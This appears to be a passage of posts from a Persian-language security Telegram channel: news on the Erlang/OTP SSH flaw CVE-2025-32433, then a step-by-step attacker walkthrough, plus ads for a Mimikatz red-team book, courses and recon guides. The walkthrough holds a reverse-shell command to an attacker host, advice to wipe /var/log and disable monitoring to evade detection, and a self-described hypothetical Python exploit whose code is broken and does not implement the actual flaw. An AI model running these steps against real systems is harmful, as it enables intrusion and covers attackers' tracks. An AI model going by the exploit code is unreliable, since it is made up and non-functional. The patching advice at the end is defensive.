سیسکو تأیید میکند که برخی از محصولات آن تحت تأثیر آسیبپذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفتهاند.
این آسیبپذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی میشود و به عنوان مشکلی در پردازش پیامهای پروتکل SSH شرح داده میشود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستمهای آسیبپذیر دسترسی پیدا کرده و کد دلخواه اجرا کند.
محققان هشدار دادند که بهرهبرداری از این آسیبپذیری میتواند منجر به تسلط کامل میزبانها شود که به افراد ثالث اجازه میدهد به دادههای حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند.
CVE-2025-32433
در نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخههای قبلی تحت تأثیر قرار دارند.
چندی پس از اینکه وجود این آسیبپذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهرهبرداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپتهای PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند.
محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاهها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاههای Cisco و Ericsson از Erlang استفاده میکنند.
هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده میکند، مانند آنچه در دستگاههای OT/IoT و دستگاههای محاسبات لبه استفاده میشود، در معرض خطر هک قرار دارد.
Arctic Wolf
نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کردهاند، این نرمافزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده میشود.
با این حال، برای این شرکتها معمولاً نصب جداگانهای از Erlang/OTP مورد نیاز است.
در همین حال، Cisco ادامه میدهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گسترهای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامههای شبکه را بررسی کند.
در حال حاضر، شرکت به طور قطعی تأیید میکند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفتهاند.
غول شبکهای اشاره کرد که اگرچه ConfD و NSO (که انتظار میرود در ماه مه اصلاح شوند) تحت تأثیر آسیبپذیری قرار دارند، به دلیل پیکربندی خود، آسیبپذیری اجرای کد از راه دور در آنها وجود ندارد.
#cve
@TryHackBox
این آسیبپذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی میشود و به عنوان مشکلی در پردازش پیامهای پروتکل SSH شرح داده میشود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستمهای آسیبپذیر دسترسی پیدا کرده و کد دلخواه اجرا کند.
محققان هشدار دادند که بهرهبرداری از این آسیبپذیری میتواند منجر به تسلط کامل میزبانها شود که به افراد ثالث اجازه میدهد به دادههای حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند.
CVE-2025-32433
در نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخههای قبلی تحت تأثیر قرار دارند.
چندی پس از اینکه وجود این آسیبپذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهرهبرداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپتهای PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند.
محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاهها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاههای Cisco و Ericsson از Erlang استفاده میکنند.
هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده میکند، مانند آنچه در دستگاههای OT/IoT و دستگاههای محاسبات لبه استفاده میشود، در معرض خطر هک قرار دارد.
Arctic Wolf
نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کردهاند، این نرمافزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده میشود.
با این حال، برای این شرکتها معمولاً نصب جداگانهای از Erlang/OTP مورد نیاز است.
در همین حال، Cisco ادامه میدهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گسترهای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامههای شبکه را بررسی کند.
در حال حاضر، شرکت به طور قطعی تأیید میکند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفتهاند.
غول شبکهای اشاره کرد که اگرچه ConfD و NSO (که انتظار میرود در ماه مه اصلاح شوند) تحت تأثیر آسیبپذیری قرار دارند، به دلیل پیکربندی خود، آسیبپذیری اجرای کد از راه دور در آنها وجود ندارد.
#cve
@TryHackBox
Cisco
Cisco Security Advisory: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server
On April 16, 2025, a critical vulnerability in the Erlang/OTP SSH server was disclosed. This vulnerability could allow an unauthenticated, remote attacker to perform remote code execution (RCE) on an affected device.
The vulnerability is due to a flaw in…
The vulnerability is due to a flaw in…
👍1
Try Hack Box
سیسکو تأیید میکند که برخی از محصولات آن تحت تأثیر آسیبپذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفتهاند. این آسیبپذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی…
برای توضیح نحوه بهرهبرداری از آسیبپذیری CVE-2025-32433 در Erlang/OTP و پیادهسازی حمله، باید ابتدا به جزئیات فنی آسیبپذیری و مکانیزم آن توجه کرد. این آسیبپذیری مربوط به پردازش نادرست پیامهای پروتکل SSH است که میتواند منجر به اجرای کد از راه دور (RCE) شود. در ادامه، مراحل کلی بهرهبرداری از این آسیبپذیری و دستورات مرتبط را بررسی میکنیم.
1. شناخت محیط تارگت
قبل از هر چیز، مهاجم باید یک سیستم آسیبپذیر را شناسایی کند. این سیستمها معمولاً شامل دستگاههایی هستند که از Erlang/OTP با نسخههای مستعد آسیبپذیری استفاده میکنند. مثالهایی از این دستگاهها عبارتند از:
- Cisco NSO و ConfD
- دستگاههای OT/IoT
- سیستمهای مدیریت شبکه
2. شناسایی سرویس SSH قابل دسترس
مهاجم باید سرویس SSH روی سیستم تارگت را شناسایی کند. این کار معمولاً با استفاده از ابزارهایی مانند
این دستور پورت 22 (معمولاً پورت پیشفرض SSH) را اسکن کرده و الگوریتمهای SSH پشتیبانیشده توسط سیستم تارگت را شناسایی میکند.
3. تهیه ابزار بهرهبرداری (Exploit Script)
با توجه به اینکه PoC (Proof of Concept) برای این آسیبپذیری در دسترس عموم قرار گرفته است، مهاجم میتواند از این اسکریپتها استفاده کند. این ابزارها معمولاً به صورت اسکریپتهای Python یا C نوشته میشوند.
مثالی از یک اسکریپت بهرهبرداری (فرضی):
4. اجرای حمله
مهاجم میتواند از طریق اجرای اسکریپت فوق، حمله را شروع کند. مراحل کلی به شرح زیر است:
الف) آمادهسازی پیلود
مهاجم باید یک پیلود مخرب تهیه کند که میتواند شامل دستورات سیستمی برای اجرای کد از راه دور باشد. مثال:
این پیلود یک Reverse Shell ایجاد میکند که به مهاجم اجازه میدهد به سیستم تارگت دسترسی کامل پیدا کند.
ب) اجرای اسکریپت
مهاجم اسکریپت را با آدرس IP، پورت و پیلود مورد نظر اجرا میکند:
5. دسترسی به سیستم تارگت
اگر حمله موفق باشد، مهاجم میتواند از طریق اتصال Reverse Shell به سیستم تارگت دسترسی کامل پیدا کند. این دسترسی میتواند شامل انجام اعمال زیر باشد:
- دستکاری فایلها
- دسترسی به دادههای حساس
- اجرای دستورات سیستمی
- نصب بدافزار یا Backdoor
6. جلوگیری از تشخیص
مهاجمان معمولاً تلاش میکنند ردپای خود را پاک کنند تا از تشخیص حمله جلوگیری کنند. این کار میتواند شامل موارد زیر باشد:
- پاک کردن لاگهای سیستم (
- غیرفعال کردن ابزارهای مانیتورینگ
- تغییر تنظیمات فایروال یا SSH
7. تأثیرات حمله
در صورت موفقیت، مهاجم میتواند:
- کنترل کامل سیستم: دسترسی root یا مدیریتی به دستگاه تارگت.
- حملات DoS: باعث ایجاد اختلال در عملکرد دستگاه شود.
- دسترسی به دادههای حساس: اطلاعات محرمانه را سرقت یا دستکاری کند.
راهکارهای مقابله
برای جلوگیری از بهرهبرداری از این آسیبپذیری، توصیههای زیر ارائه میشود:
1. بهروزرسانی Erlang/OTP: نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 را نصب کنید.
2. غیرفعال کردن SSH: اگر استفاده از SSH ضروری نیست، آن را غیرفعال کنید.
3. استفاده از فایروال: دسترسی به پورت SSH را محدود کنید.
4. نظارت بر لاگها: به دنبال فعالیتهای مشکوک در لاگهای سیستم باشید.
@TryHackBox
1. شناخت محیط تارگت
قبل از هر چیز، مهاجم باید یک سیستم آسیبپذیر را شناسایی کند. این سیستمها معمولاً شامل دستگاههایی هستند که از Erlang/OTP با نسخههای مستعد آسیبپذیری استفاده میکنند. مثالهایی از این دستگاهها عبارتند از:
- Cisco NSO و ConfD
- دستگاههای OT/IoT
- سیستمهای مدیریت شبکه
2. شناسایی سرویس SSH قابل دسترس
مهاجم باید سرویس SSH روی سیستم تارگت را شناسایی کند. این کار معمولاً با استفاده از ابزارهایی مانند
nmap انجام میشود. دستور زیر میتواند برای اسکن پورتهای باز و شناسایی خدمات SSH استفاده شود:nmap -p 22 <IP_target> --noscript ssh2-enum-algos
این دستور پورت 22 (معمولاً پورت پیشفرض SSH) را اسکن کرده و الگوریتمهای SSH پشتیبانیشده توسط سیستم تارگت را شناسایی میکند.
3. تهیه ابزار بهرهبرداری (Exploit Script)
با توجه به اینکه PoC (Proof of Concept) برای این آسیبپذیری در دسترس عموم قرار گرفته است، مهاجم میتواند از این اسکریپتها استفاده کند. این ابزارها معمولاً به صورت اسکریپتهای Python یا C نوشته میشوند.
مثالی از یک اسکریپت بهرهبرداری (فرضی):
import paramiko
import sys
def exploit(ip, port, payload):
try:
# ایجاد اتصال SSH
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# ارسال پیام خاصی که آسیبپذیری را فعال میکند
transport = paramiko.Transport((ip, port))
transport.start_client()
# ارسال پیلود مخرب
transport._send_message(payload)
print("[+] Exploit Sent!")
# اجرا و دسترسی به سیستم
stdin, stdout, stderr = client.exec_command("id")
print(stdout.read().decode())
except Exception as e:
print(f"[-] Failed: {e}")
if __name__ == "__main__":
if len(sys.argv) != 4:
print(f"Usage: {sys.argv[0]} <IP> <Port> <Payload>")
sys.exit(1)
ip = sys.argv[1]
port = int(sys.argv[2])
payload = sys.argv[3]
exploit(ip, port, payload)
4. اجرای حمله
مهاجم میتواند از طریق اجرای اسکریپت فوق، حمله را شروع کند. مراحل کلی به شرح زیر است:
الف) آمادهسازی پیلود
مهاجم باید یک پیلود مخرب تهیه کند که میتواند شامل دستورات سیستمی برای اجرای کد از راه دور باشد. مثال:
/bin/bash -c "nc -e /bin/bash <IP_Attacker> <Port>"
این پیلود یک Reverse Shell ایجاد میکند که به مهاجم اجازه میدهد به سیستم تارگت دسترسی کامل پیدا کند.
ب) اجرای اسکریپت
مهاجم اسکریپت را با آدرس IP، پورت و پیلود مورد نظر اجرا میکند:
python3 exploit.py <IP_Target> "/bin/bash -c 'nc -e /bin/bash <IP_attacker> <Port>'"
5. دسترسی به سیستم تارگت
اگر حمله موفق باشد، مهاجم میتواند از طریق اتصال Reverse Shell به سیستم تارگت دسترسی کامل پیدا کند. این دسترسی میتواند شامل انجام اعمال زیر باشد:
- دستکاری فایلها
- دسترسی به دادههای حساس
- اجرای دستورات سیستمی
- نصب بدافزار یا Backdoor
6. جلوگیری از تشخیص
مهاجمان معمولاً تلاش میکنند ردپای خود را پاک کنند تا از تشخیص حمله جلوگیری کنند. این کار میتواند شامل موارد زیر باشد:
- پاک کردن لاگهای سیستم (
/var/log/)- غیرفعال کردن ابزارهای مانیتورینگ
- تغییر تنظیمات فایروال یا SSH
7. تأثیرات حمله
در صورت موفقیت، مهاجم میتواند:
- کنترل کامل سیستم: دسترسی root یا مدیریتی به دستگاه تارگت.
- حملات DoS: باعث ایجاد اختلال در عملکرد دستگاه شود.
- دسترسی به دادههای حساس: اطلاعات محرمانه را سرقت یا دستکاری کند.
راهکارهای مقابله
برای جلوگیری از بهرهبرداری از این آسیبپذیری، توصیههای زیر ارائه میشود:
1. بهروزرسانی Erlang/OTP: نسخههای OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 را نصب کنید.
2. غیرفعال کردن SSH: اگر استفاده از SSH ضروری نیست، آن را غیرفعال کنید.
3. استفاده از فایروال: دسترسی به پورت SSH را محدود کنید.
4. نظارت بر لاگها: به دنبال فعالیتهای مشکوک در لاگهای سیستم باشید.
@TryHackBox
👍8
Try Hack Box
برای توضیح نحوه بهرهبرداری از آسیبپذیری CVE-2025-32433 در Erlang/OTP و پیادهسازی حمله، باید ابتدا به جزئیات فنی آسیبپذیری و مکانیزم آن توجه کرد. این آسیبپذیری مربوط به پردازش نادرست پیامهای پروتکل SSH است که میتواند منجر به اجرای کد از راه دور (RCE)…
نتیجهگیری
آسیبپذیری CVE-2025-32433 به دلیل سادگی بهرهبرداری و تأثیرات بالقوهاش، تهدیدی جدی برای سیستمهایی است که از Erlang/OTP استفاده میکنند. مهاجمان میتوانند از این آسیبپذیری برای دسترسی کامل به سیستمها و انجام حملات مختلف استفاده کنند. بنابراین، بهروزرسانی نرمافزارها و اجرای تدابیر امنیتی ضروری است.
⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شدهاند و هرگونه استفاده غیرقانونی از آنها ممنوع است.
#cve
@TryHackBox
آسیبپذیری CVE-2025-32433 به دلیل سادگی بهرهبرداری و تأثیرات بالقوهاش، تهدیدی جدی برای سیستمهایی است که از Erlang/OTP استفاده میکنند. مهاجمان میتوانند از این آسیبپذیری برای دسترسی کامل به سیستمها و انجام حملات مختلف استفاده کنند. بنابراین، بهروزرسانی نرمافزارها و اجرای تدابیر امنیتی ضروری است.
⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شدهاند و هرگونه استفاده غیرقانونی از آنها ممنوع است.
#cve
@TryHackBox
👍2
👍3
Google Dork by THB.pdf
1019.5 KB
برای درک چگونگی استفاده از موتورهای جستجو (به ویژه گوگل) برای پیداکردن سیستمهای آسیبپذیر، مدتی را به بررسی قابلیتهای جستجوی پیشرفته در گوگل اختصاص خواهیم داد. با بهکارگیری اصول مختلف جستجو که درآموزش های بعدی بحث خواهیم کرد....
#GHD #GoogleDork
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
#GHD #GoogleDork
@TryHackBox
@TryHackBoxOfficial
@TryHackBoxStory
@RadioZeroPod
👍5🔥1
📚 کتابچه "Mimikatz: تسلط عملی بر تکنیکهای پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته.
اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید!
منبعی کامل برای تیمهای قرمز (Red Team)، شامل دستورات عملی، اسکریپتهای آماده، و تکنیکهای evasion است که مستقیماً در تستهای نفوذ استفاده میشوند.
همین حالا این کتاب تخصصی را به زبان فارسی بخوانید.
🔥 عرضه ویژه اولین فروش:
💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان
💥 با ۴۰٪ تخفیف: فقط ۱۵۰,۰۰۰ تومان
⚠️مهلت تخفیف: تنها ۵ روز دیگر!
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید!
منبعی کامل برای تیمهای قرمز (Red Team)، شامل دستورات عملی، اسکریپتهای آماده، و تکنیکهای evasion است که مستقیماً در تستهای نفوذ استفاده میشوند.
همین حالا این کتاب تخصصی را به زبان فارسی بخوانید.
🔥 عرضه ویژه اولین فروش:
💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان
💥
⚠️
📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید:
@THBxSupport
👍1
Try Hack Box
📚 کتابچه "Mimikatz: تسلط عملی بر تکنیکهای پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته. اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید! منبعی کامل برای تیمهای قرمز (Red…
⭕ قابل توجه دوستان
متاسفانه دوستان این نسخه جدید رو با نسخه قبلی که این نسخه میشه اشتباه گرفتند دوستان این نسخه دیگری است و مطالب با نسخه قبلی فرق دارد .
متاسفانه دوستان این نسخه جدید رو با نسخه قبلی که این نسخه میشه اشتباه گرفتند دوستان این نسخه دیگری است و مطالب با نسخه قبلی فرق دارد .
Telegram
Try Hack Box
⭕ | راهنمای جامع ابزار Mimikatz
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامهها،…
این کتاب به بررسی ابزار Mimikatz میپردازد که برای استخراج پسوردها، هشها و توکنهای دسترسی از حافظه سیستم استفاده میشود. در این کتاب، شما با تکنیکهای پایه تا پیشرفته Mimikatz آشنا خواهید شد، از جمله استخراج اعتبارنامهها،…
✏️ نحوه ثبت سریع گزارش آسیبپذیری: ChatGPT Prompt
تست نفوذ نه تنها پیداکردن یک حفره امنیتی است، بلکه انتقال صحیح آن به مشتری یا پلتفرم پاداش در ازای باگ (bug bounty platform) را نیز شامل میشود. اما تهیه گزارش یک کار بیهوده است: خسته کننده است، زمان زیادی طول می کشد و Markdown در مهمترین لحظه فراموش می شود.
برای صرفهجویی در وقت شما در قالبها و متنبندی، در اینجا یک نمونه سوال وجود دارد که همه کارها را برای شما انجام میدهد:
🔴 پرامپت:
آنچه در نتیجه به دست میآوریم:
1️⃣ عنوان با دستهبندی آسیبپذیری
2️⃣ شرح و بردار حمله
3️⃣ نمره CVSS
4️⃣ اثبات مفهوم
5️⃣ توصیههایی برای رفع مشکلات
نه تنها برای XSS، بلکه برای SQLi، IDOR، CSRF و سایر نیز قابل استفاده است .
- فقط کافیست PoC را تطبیق دهید و تمام.
#chatgpt #prompt
@TryHackBox
تست نفوذ نه تنها پیداکردن یک حفره امنیتی است، بلکه انتقال صحیح آن به مشتری یا پلتفرم پاداش در ازای باگ (bug bounty platform) را نیز شامل میشود. اما تهیه گزارش یک کار بیهوده است: خسته کننده است، زمان زیادی طول می کشد و Markdown در مهمترین لحظه فراموش می شود.
برای صرفهجویی در وقت شما در قالبها و متنبندی، در اینجا یک نمونه سوال وجود دارد که همه کارها را برای شما انجام میدهد:
🔴 پرامپت:
Write a bug bounty report for the following reflected XSS: [درج PoC]. Include: Title, VRT, CVSS, Denoscription, Impact, PoC, and recommended Fix. Use Markdown.آنچه در نتیجه به دست میآوریم:
1️⃣ عنوان با دستهبندی آسیبپذیری
2️⃣ شرح و بردار حمله
3️⃣ نمره CVSS
4️⃣ اثبات مفهوم
5️⃣ توصیههایی برای رفع مشکلات
نه تنها برای XSS، بلکه برای SQLi، IDOR، CSRF و سایر نیز قابل استفاده است .
- فقط کافیست PoC را تطبیق دهید و تمام.
#chatgpt #prompt
@TryHackBox
❤🔥4👎2👍1
دوستان اگر تجربه خوب و رزومه دارید میتونید در جهت تدریس دوره همکاری کنید به ما پیام بدید دوره هایی که در نظر داریم موارد زیر است :
دوره آنلاین و افلاین برگزار خواهد شد .
Linux :
- Lpic1 , Lpic2 , Lpic3
Network :
- MCSA/MCSE , CCNA , CCNP
SECURITY :
- SEC542 , SEC642 , SEC560 , SEC660
- PWK , EJPT ,
( SANS , OFFSEC , ELEARN SECURITY , PENTESTER ACADEMY )
Pogramming :
- Python , C/Cpp , ruby , js , php etc ...
جهت ارتباط به ما پیام بدید :
@THBxSupport
دوره آنلاین و افلاین برگزار خواهد شد .
Linux :
- Lpic1 , Lpic2 , Lpic3
Network :
- MCSA/MCSE , CCNA , CCNP
SECURITY :
- SEC542 , SEC642 , SEC560 , SEC660
- PWK , EJPT ,
( SANS , OFFSEC , ELEARN SECURITY , PENTESTER ACADEMY )
Pogramming :
- Python , C/Cpp , ruby , js , php etc ...
جهت ارتباط به ما پیام بدید :
@THBxSupport
👍2
Reconnaissance MetaData by THB Team.pdf
865.7 KB
گام بعدی در شناسایی، تشخیص کاربران سازمان خواهد بود. هدف شناسایی نامها، آدرسهای ایمیل، نامهای کاربری و فرمت نام کاربری است. آدرسهای ایمیل برای فیشینگ بسیار مفید هستند. اگر بتوانیم با استفاده از نام تارگت، ایمیل فیشینگ را شخصیسازی کنیم، موفقیت آن بیشتر خواهد شد. همچنین از نامها و آدرسهای ایمیل میتوان برای تهیه فهرست نامهای کاربری استفاده کرد که در حملات حدس زدن رمز عبور بسیار کمککننده است.
➖➖➖➖➖➖➖➖➖
#Metadata #Recon
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
"سندی که امروز بیخطر به نظر میرسد، فردا ممکن است کلید نفوذ به شبکه شما باشد!"
➖➖➖➖➖➖➖➖➖
#Metadata #Recon
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
👍6
🪲 چگونه از آخرین CVE های موجود مطلع بمانیم؟
#CVE #tips
@TryHackBox
curl cvedb.shodan.io/cves | jq | grep "cve_id"
#CVE #tips
@TryHackBox
👍11
🔴در دنیای امنیت سایبری و فناوری اطلاعات، مهارتهای عملی و تجربههای واقعی اهمیت زیادی دارند. سایت challenginno.ir با الهام از پلتفرمهایی مانند Hack the Box و Try Hack Me، محیطی را برای علاقهمندان به امنیت سایبری فراهم کرده است تا بتوانند با شرکت در چالشهای مختلف، مهارتهای خود را در این زمینه تقویت کنند.
🔻این سایت، یک پلتفرم آموزشی و چالشمحور است که به کاربران امکان میدهد تا با شرکت در چالشهای امنیت سایبری، دانش خود را در حوزههای مختلف امنیت سایبری مانند تست نفوذ و ارزیابی امنیتی، تیم قرمز، تیم آبی، فارنزیک، شکار تهدید (Threat Hunting) و غیره بهبود بخشند.
🔻همچنین برگزاری RedTime/BlueTime ها و برگزاری دورههای مبتنی بر چالش، رویکردهای دیگری است که در این پلتفرم قرار داده خواهد شد.
✅اگر به دنبال تقویت مهارتهای امنیت سایبری خود بهوسیله حل چالشهای واقعی امنیت سایبری هستید به challenginno بپیوندید:
🌐https://challenginno.ir
🪩https://news.1rj.ru/str/challenginno
🔻این سایت، یک پلتفرم آموزشی و چالشمحور است که به کاربران امکان میدهد تا با شرکت در چالشهای امنیت سایبری، دانش خود را در حوزههای مختلف امنیت سایبری مانند تست نفوذ و ارزیابی امنیتی، تیم قرمز، تیم آبی، فارنزیک، شکار تهدید (Threat Hunting) و غیره بهبود بخشند.
🔻همچنین برگزاری RedTime/BlueTime ها و برگزاری دورههای مبتنی بر چالش، رویکردهای دیگری است که در این پلتفرم قرار داده خواهد شد.
✅اگر به دنبال تقویت مهارتهای امنیت سایبری خود بهوسیله حل چالشهای واقعی امنیت سایبری هستید به challenginno بپیوندید:
🌐https://challenginno.ir
🪩https://news.1rj.ru/str/challenginno
👍6
برگزاری جلسه لایو : تست نفوذ با مهندس سجاد تیموری
با سلام خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص تست نفوذ (Penetration Testing) به صورت زنده برگزار کنیم.
🎙️ مهمان ویژه:
مهندس سجاد تیموری – کارشناس تست نفوذ
📅 زمان برگزاری: سه شنبه 1404/02/23
📍 پلتفرم: کانال ما در یوتیوب
🔗 https://youtube.com/@tryhackbox
💬 موضوعات خود را درباره تست نفوذ در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت مشاهده به موقع لایو، حتماً کانال یوتیوب ما را سابسکرایب (Subscribe) کنید تا از پخش زنده این برنامه و برنامههای بعدی مطلع شوید.
@TryHackBox
با سلام خدمت دوستان و همراهان عزیز،
در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص تست نفوذ (Penetration Testing) به صورت زنده برگزار کنیم.
🎙️ مهمان ویژه:
مهندس سجاد تیموری – کارشناس تست نفوذ
📅 زمان برگزاری: سه شنبه 1404/02/23
📍 پلتفرم: کانال ما در یوتیوب
🔗 https://youtube.com/@tryhackbox
💬 موضوعات خود را درباره تست نفوذ در کامنتهاارسال کنید تا در جلسه به آنها پرداخته شود.
🔔 نکته مهم:
جهت مشاهده به موقع لایو، حتماً کانال یوتیوب ما را سابسکرایب (Subscribe) کنید تا از پخش زنده این برنامه و برنامههای بعدی مطلع شوید.
@TryHackBox
❤8👍2
Try Hack Box
برگزاری جلسه لایو : تست نفوذ با مهندس سجاد تیموری با سلام خدمت دوستان و همراهان عزیز، در راستای ارتقای سطح دانش فنی و آشنایی بیشتر با مباحث امنیت سایبری، قصد داریم جلسهای تخصصی و آموزشی در خصوص تست نفوذ (Penetration Testing) به صورت زنده برگزار کنیم. …
موضوعات خود و سوالاتی که دارید حتما کامنت کنید
دوستان کانال دیگر ما فعال شد و در زمینه تست نفوذ وب فعالیت خواهد داشت در این کانال هم به رودمپ های مختلف و به آموزش های دیگه دسترسی خواهید داشت :
@TryHackBoxOfficial
@TryHackBoxOfficial